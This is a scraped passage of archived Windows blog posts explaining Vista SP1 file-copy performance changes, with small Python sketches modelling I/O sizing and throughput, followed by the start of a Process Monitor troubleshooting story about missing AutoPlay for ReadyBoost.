</FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> After studying various alternatives, the team decided to implement a copy engine that tended to issue large asynchronous non-cached I/Os, addressing all the problems they had identified. With non-cached I/Os, copied file data doesn’t consume memory on the local system, hence preserving memory’s existing contents. Asynchronous large file I/Os allow for the pipelining of data across high-latency network connections, and CPU usage is decreased because the Cache Manager doesn’t have to manage its memory mappings. Inefficiencies in the original Vista Cache Manager’s handling of large I/Os also contributed to the decision to use non-cached I/Os. They couldn’t make I/Os arbitrarily large, however, because the copy engine needs to read data before writing it, and performing reads and writes concurrently is desirable, especially for copies to different disks or systems. Large I/Os also pose challenges for providing accurate time estimates to the user because there are fewer points to measure progress and update the estimate. The team did note a significant downside of non-cached I/Os, though: during a copy of many small files the disk head constantly moves around the disk, first to a source file, then to a destination, back to another source, and so on. 
</FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> After much analysis, benchmarking and tuning, the team implemented an algorithm that uses cached I/O for files smaller than 256KB in size. For files larger than 256KB, the engine relies on an internal matrix to determine the number and size of non-cached I/Os it will have in flight at once. The number ranges from 2 for files smaller than 2MB to 8 for files larger than 8MB. The size of the I/O is the file size for files smaller than 1MB, 1MB for files up to 2MB, and 2MB for anything larger. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> To copy a 16MB file, for example, the engine issues eight 2MB asynchronous non-cached reads of the source file, waits for the I/Os to complete, issues eight 2MB asynchronous non-cached writes of the destination, waits again for the writes to complete, and then repeats the cycle. 
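</FONT></FONT></SPAN></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> To make the sizing rules concrete, here is a minimal Python sketch of the decisions described above. It is an illustration only, not the copy engine’s code: the function names are hypothetical, treating a file of exactly 256KB as non-cached is an assumption, and the in-flight counts for files between 2MB and 8MB are left undefined because the matrix values for that range aren’t listed here. </FONT></FONT></SPAN></P>

```python
KB = 1024
MB = 1024 * KB


def uses_cached_io(file_size: int) -> bool:
    """Files smaller than 256KB take the cached path (exactly 256KB is assumed non-cached)."""
    return 256 * KB > file_size


def io_size(file_size: int) -> int:
    """Size of each non-cached I/O: the file size, 1MB, or 2MB."""
    if 1 * MB > file_size:
        return file_size
    if 2 * MB >= file_size:
        return 1 * MB
    return 2 * MB


def ios_in_flight(file_size: int):
    """Number of concurrent I/Os; only the two stated endpoints are modeled."""
    if 2 * MB > file_size:
        return 2
    if file_size > 8 * MB:
        return 8
    return None  # intermediate matrix values are not given in the text


def plan_cycles(file_size: int):
    """Group (offset, length) I/Os into cycles: each cycle is read fully, then written."""
    count = ios_in_flight(file_size)
    if uses_cached_io(file_size) or count is None:
        raise ValueError("size not covered by this sketch")
    size = io_size(file_size)
    chunks = [(off, min(size, file_size - off)) for off in range(0, file_size, size)]
    return [chunks[i:i + count] for i in range(0, len(chunks), count)]


cycles = plan_cycles(16 * MB)
print(len(cycles), len(cycles[0]), cycles[0][0])  # 1 8 (0, 2097152)
```

<P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> For a 16MB file the sketch yields a single cycle of eight 2MB I/Os, which matches the example above; a larger file would simply produce more cycles. </FONT></FONT></SPAN></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri">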
You can see that pattern in this Process Monitor trace of a 16MB file copy from a local system to a remote one: </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> </SPAN> <SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> <IMG height="226" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815678/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815678/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121010i59EBDAC5D451F182" style="WIDTH: 550px; HEIGHT: 226px" width="550" /> </FONT> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> While this algorithm is an improvement over the previous one in many ways, it does have some drawbacks. 
One that occurs sporadically on network file copies is out-of-order write operations, one of which is visible in this trace of the receive side of a copy: </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> </SPAN> <SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815680/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815680/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121011i976351035E27F609" /> </FONT> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Note how the write operation offsets jump from 327,680 to 458,752, skipping the block at offset 393,216. That skip causes a disk head seek and forces NTFS to issue an unnecessary write operation to the skipped region to zero that part of the file, which is why there are two writes to offset 393,216. 
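</FONT></FONT></SPAN></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> The offsets quoted above are consistent with 64KB write blocks, since 393,216 - 327,680 = 65,536. As a small sketch under that assumption, the following Python snippet lists the block-aligned offsets that are jumped over between consecutive writes; the helper name is hypothetical and the block size is inferred from the offsets rather than taken from NTFS. </FONT></FONT></SPAN></P>

```python
BLOCK = 64 * 1024  # assumed block size, inferred from the offsets in the trace


def skipped_offsets(write_offsets, block=BLOCK):
    """Return block-aligned offsets jumped over between consecutive writes."""
    gaps = []
    for prev, cur in zip(write_offsets, write_offsets[1:]):
        # A forward jump of more than one block leaves unwritten blocks behind.
        gaps.extend(range(prev + block, cur, block))
    return gaps


print(skipped_offsets([327680, 458752]))  # [393216]
```

<P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri">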
You can see NTFS calling the Cache Manager’s CcZeroData function to zero the skipped block in the stack trace for the highlighted event: </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> </SPAN> <SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> <IMG height="258" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815683/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815683/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121012iB1374E4C02D62D8D" style="WIDTH: 309px; HEIGHT: 258px" width="309" /> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> A bigger problem with using non-cached I/O is that performance can suffer in publishing scenarios. If you copy a group of files to a file share that represents the contents of a Web site, for example, the Web server must read the files from disk when it first accesses them. This obviously applies to servers, but most copy operations are publishing scenarios even on client systems, because the appearance of new files causes desktop search indexing, triggers antivirus and antispyware scans, and cues Explorer to generate thumbnails for display on the parent directory’s folder icon. 
</FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Perhaps the biggest drawback of the algorithm, and the one that has caused many Vista users to complain, is that for copies involving a large group of files between 256KB and tens of MB in size, the perceived performance of the copy can be significantly worse than on Windows XP. That’s because the previous algorithm’s use of cached file I/O lets Explorer finish writing destination files to memory and dismiss the copy dialog long before the Cache Manager’s write-behind thread has actually committed the data to disk; with Vista’s non-cached implementation, Explorer is forced to wait for each write operation to complete before issuing more, and ultimately for all copied data to be on disk before indicating a copy’s completion. In Vista, Explorer also waits 12 seconds before making an estimate of the copy’s duration and the estimation algorithm is sensitive to fluctuations in the copy speed, both of which exacerbate user frustration with slower copies. 
</FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <B style="mso-bidi-font-weight: normal"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> SP1 Improvements </FONT></FONT></SPAN></B></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> During Vista SP1’s development, the product team decided to revisit the copy engine to explore ways to improve both the real and perceived performance of copy operations for the cases that suffered in the new implementation. The biggest change they made was to go back to using cached file I/O again for all file copies, both local and remote, with one exception that I’ll describe shortly. With caching, perceived copy time and the publishing scenario both improve. However, several significant changes in both the file copy algorithm and the platform were required to address the shortcomings of cached I/O I’ve already noted. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> The one case where the SP1 file copy engine doesn't use caching is for remote file copies, where it prevents the double-caching problem by leveraging support in the Windows client-side remote file system driver, Rdbss.sys. It does so by issuing a command to the driver that tells it not to cache a remote file on the local system as it is being read or written. 
You can see the command being issued by Explorer in the following Process Monitor capture: </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> </SPAN> <SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815681/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815681/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121013i35645BAF8C61613E" /> </FONT> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Another enhancement for remote copies is the pipelined I/Os issued by the SMB2 file system driver, srv2.sys, which is new to Windows Vista and Windows Server 2008. Instead of issuing 60KB I/Os across the network like the original SMB implementation, SMB2 issues pipelined 64KB I/Os so that when it receives a large I/O from an application, it will issue multiple 64KB I/Os concurrently, allowing for the data to stream to or from the remote system with fewer latency stalls. 
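</FONT></FONT></SPAN></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> As a rough illustration of why pipelining helps, the Python sketch below splits one large application I/O into protocol-sized requests and compares two deliberately simplified extremes: sending one request at a time versus having all requests in flight at once. The function names, the round-trip time, and the bandwidth figure are hypothetical values chosen for the example, and the timing model ignores everything a real SMB implementation does beyond chunking. </FONT></FONT></SPAN></P>

```python
KB = 1024


def split_io(offset, length, chunk):
    """Split one large I/O into (offset, size) requests of at most `chunk` bytes."""
    end = offset + length
    return [(off, min(chunk, end - off)) for off in range(offset, end, chunk)]


def serial_seconds(requests, rtt, bytes_per_second):
    """Toy model: each request pays a full round trip before the next one starts."""
    return sum(rtt + size / bytes_per_second for _, size in requests)


def pipelined_seconds(requests, rtt, bytes_per_second):
    """Toy model: all requests are in flight together, so latency is paid once."""
    return rtt + sum(size for _, size in requests) / bytes_per_second


big_io = 1024 * KB                      # a 1MB I/O from the application
smb2 = split_io(0, big_io, 64 * KB)     # 64KB requests
smb1 = split_io(0, big_io, 60 * KB)     # 60KB requests
print(len(smb2), len(smb1))  # 16 18

rtt, bandwidth = 0.05, 10 * 1024 * KB   # hypothetical: 50ms round trip, 10MB/s link
print(serial_seconds(smb1, rtt, bandwidth) > pipelined_seconds(smb2, rtt, bandwidth))  # True
```

<P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> In this toy model the serial case pays the round-trip latency once per request, while the pipelined case pays it roughly once per large I/O, which is the effect the larger application I/Os are meant to unlock. 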
</FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> The copy engine also issues four initial I/Os of sizes ranging from 128KB to 1MB, depending on the size of the file being copied, which triggers the Cache Manager read-ahead thread to issue large I/Os. The platform change made in SP1 to the Cache Manager has it perform larger I/O for both read-ahead and write-behind. The larger I/Os are only possible because of work done in the original Vista I/O system to support I/Os larger than 64KB, which was the limit in previous versions of Windows. Larger I/Os also improve performance on local copies because there are fewer disk accesses and disk seeks, and it enables the Cache Manager write-behind thread to better keep up with the rate at which memory fills with copied file data. That reduces, though not necessarily eliminates, memory pressure that causes active memory contents to be discarded during a copy. Finally, for remote copies the large I/Os let the SMB2 driver use pipelining. The Cache Manager issues read I/Os that are twice the size of the I/O issued by the application, up to a maximum of 2MB on Vista and 16MB on Server 2008, and write I/Os of up to 1MB in size on Vista and up to 32MB on Server 2008. 
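</FONT></FONT></SPAN></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> The read-ahead sizing rule above (twice the application's I/O size, up to a platform maximum) can be written down in a few lines. This is a sketch of the rule as stated in the text, not the Cache Manager's actual code; the function and table names are made up for illustration. </FONT></FONT></SPAN></P>

```python
KB = 1024
MB = 1024 * KB

# Maximum Cache Manager read I/O sizes quoted in the text for SP1.
READ_AHEAD_CAP = {"Vista": 2 * MB, "Server 2008": 16 * MB}


def read_ahead_bytes(app_io_bytes, platform):
    """Twice the application's I/O size, clamped to the platform maximum."""
    return min(2 * app_io_bytes, READ_AHEAD_CAP[platform])


for app_io in (128 * KB, 1 * MB, 4 * MB):
    for platform in READ_AHEAD_CAP:
        size = read_ahead_bytes(app_io, platform)
        print(f"{platform:12} app I/O {app_io // KB:5} KB -> read-ahead {size // KB:6} KB")
```

<P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> For a 1MB application I/O on Vista the rule yields a 2MB read, which is the maximum for that platform. 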
</FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> This trace excerpt of a 16MB file copy from one SP1 system to another shows 1MB I/Os issued by Explorer and a 2MB Cache Manager read-ahead, which is distinguished by its non-cached I/O flag: </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000; mso-no-proof: yes"> </SPAN> <SPAN style="COLOR: #000000"> </SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> <IMG height="116" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815685/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2815685/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121014i62D19E5C89767007" style="WIDTH: 550px; HEIGHT: 116px" width="550" /> </FONT> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Unfortunately, the SP1 changes, while delivering consistently better performance than previous versions of Windows, can be slower than the original Vista release in a couple of specific cases. The first is when copying to or from a Server 2003 system over a slow network. 
The original Vista copy engine would deliver a high-speed copy, but, because of the out-of-order I/O problem I mentioned earlier, trigger pathologic behavior in the Server 2003 Cache Manager that could cause all of the server’s memory to be filled with copied file data. The SP1 copy engine changes avoid that, but because the engine&nbsp;issues 32KB I/Os instead of 60KB I/Os, the throughput it achieves on high-latency connections can approach half of what the original Vista release achieved. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> The other case where SP1 might not perform as well as original Vista is for large file copies on the same volume. Since SP1 issues smaller I/Os, primarily to allow the rest of the system to have better access to the disk and hence better responsiveness during a copy, the number of disk head seeks between reads from the source and writes to the destination files can be higher, especially on disks that don’t avoid seeks with efficient internal queuing algorithms. </FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> One final SP1 change worth mentioning is that Explorer makes copy duration estimates much sooner than the original Vista release and the estimation algorithm is more accurate. 
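</FONT></FONT></SPAN></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Returning to the Server 2003 case described above, the "approach half" figure follows from simple arithmetic if the copy is assumed to be latency-bound with a single I/O outstanding per round trip. The sketch below makes that assumption explicit; the 100 ms round-trip time and the function name are hypothetical, and the ratio does not depend on the round-trip time chosen. </FONT></FONT></SPAN></P>

```python
KB = 1024


def latency_bound_throughput(io_bytes, rtt_seconds):
    """Bytes per second when only one I/O is outstanding per round trip."""
    return io_bytes / rtt_seconds


rtt = 0.1  # assumed 100 ms round trip on a high-latency link (hypothetical)

sp1 = latency_bound_throughput(32 * KB, rtt)       # SP1 engine: 32KB I/Os
original = latency_bound_throughput(60 * KB, rtt)  # original Vista: 60KB I/Os
ratio = sp1 / original

print(f"SP1 / original Vista throughput: {ratio:.2f}")
```

<P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> The ratio is 32/60, or a little over one half, and it only applies when latency rather than bandwidth is the bottleneck. 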
</FONT></FONT></SPAN></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> </SPAN></P><P> <FONT face="Calibri" size="3"> </FONT> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <B style="mso-bidi-font-weight: normal"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> Summary </FONT></FONT></SPAN></B></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 0pt"> <SPAN style="COLOR: #000000"> <FONT size="3"> <FONT face="Calibri"> File copying is not as easy as it might first appear, but the product team took the feedback they got from Vista customers very seriously and spent hundreds of hours evaluating different approaches and tuning the final implementation to restore most copy scenarios to at least the performance of previous versions of Windows and drastically improve some key scenarios. The changes apply both to Explorer copies and to copies initiated by applications using the <A class="" href="#" mce_href="#" target="_blank"> CopyFileEx </A> API. You’ll see the biggest improvements over older versions of Windows when copying files on high-latency, high-bandwidth networks, where the large I/Os, SMB2’s I/O pipelining, and Vista’s TCP/IP stack receive-window auto-tuning can literally deliver what would be a ten-minute copy on Windows XP or Server 2003 in one minute. Pretty cool. 
</FONT></FONT></SPAN></P><P> </P> <P></P> </BODY></HTML> Thu, 27 Jun 2019 06:38:12 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/inside-vista-sp1-file-copy-improvements/ba-p/723622 MarkRussinovich 2019-06-27T06:38:12Z The Case of the Missing AutoPlay https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-missing-autoplay/ba-p/723613 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Dec 31, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <B style="mso-bidi-font-weight: normal"> <FONT size="3"> <FONT face="Calibri"> </FONT></FONT></B></P><P> </P> <FONT face="Calibri" size="3"> I’ve been presenting talks on Windows Vista kernel changes since TechEd US in the summer of 2006 and one of the features I cover in the session is ReadyBoost, a write-through disk caching technology that can potentially improve system performance by leveraging flash media as a disk cache. I explain ReadyBoost in depth in my TechNet Magazine article, “ <A class="" href="#" mce_href="#" target="_blank"> Inside the Windows Vista Kernel: Part 2 </A> ”, </FONT> <FONT face="Calibri" size="3"> but the basic idea is that, since flash has significantly better random access latency than disk, ReadyBoost intercepts disk accesses and directs random-access reads to its cache when the cache holds the data, but sends sequential accesses directly to the disk. 
During my presentation, I insert a USB key, whereupon Windows displays an AutoPlay dialog that includes an option to configure the device for ReadyBoost caching: </FONT> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="237" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696756/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696756/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121000i36FEFD9A04DB0E6C" style="WIDTH: 334px; HEIGHT: 237px" width="334" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The first time I gave the talk, the demonstration went flawlessly, but in subsequent deliveries I didn’t get the AutoPlay experience. I would notice the lack of AutoPlay as I ran through the demonstrations before a session, but was always pressed for time and so couldn’t investigate. 
As a workaround, I would manually open the properties dialog of the device’s volume after insertion to show the ReadyBoost page that’s displayed when you click on the “Speed up my system” link on the AutoPlay dialog. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The last time I presented the session, at TechEd/ITforum in Barcelona in November, I had some extra time beforehand so I decided to find out why AutoPlay wasn’t working. The first thing I did was to check the AutoPlay settings, which you configure in the AutoPlay section of the Control Panel’s Hardware and Sound page. Some of the entries were set to “Ask me every time”, which shouldn’t have had any effect, and even after resetting to the defaults, AutoPlay still didn’t work: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="210" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696759/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696759/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121001i56E105F5CC83B311" style="WIDTH: 550px; HEIGHT: 210px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> At this point I had to look under the hood at an insertion’s associated Registry and file system activity to see if that would reveal the reason why Explorer wasn’t honoring the Control Panel’s AutoPlay settings. I ran <A class="" href="#" mce_href="#" target="_blank"> Process Monitor </A> , configured the filter to include Explorer’s Registry operations, and re-inserted the key. Then I stopped the capture and looked at what Process Monitor had collected. 
</FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> A staggering 22,000 events meant that scanning through the trace event-by-event would take hours and there were no obvious error codes to search for, so I had to think of some keyword that might lead me to the relevant lines. I first searched for “autoplay”, but came up empty. I knew that Explorer looks for a file named Autorun.inf in the root directory of removable media volumes, which can contain pointers to an icon to show for the volume and an executable that launches when the user double-clicks on the volume, so I next searched for “autorun”. The first hit didn’t look interesting because it referred to the volume’s mount-point GUID, information that Windows generates dynamically when it notices a new volume: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="70" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696763/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696763/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121002i866E36E70DD133F2" style="WIDTH: 550px; HEIGHT: 70px" width="550" /> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The next hits were just a few entries later and all referred to values that store Group Policy settings: </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> <IMG height="119" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/2696764/original.aspx" 
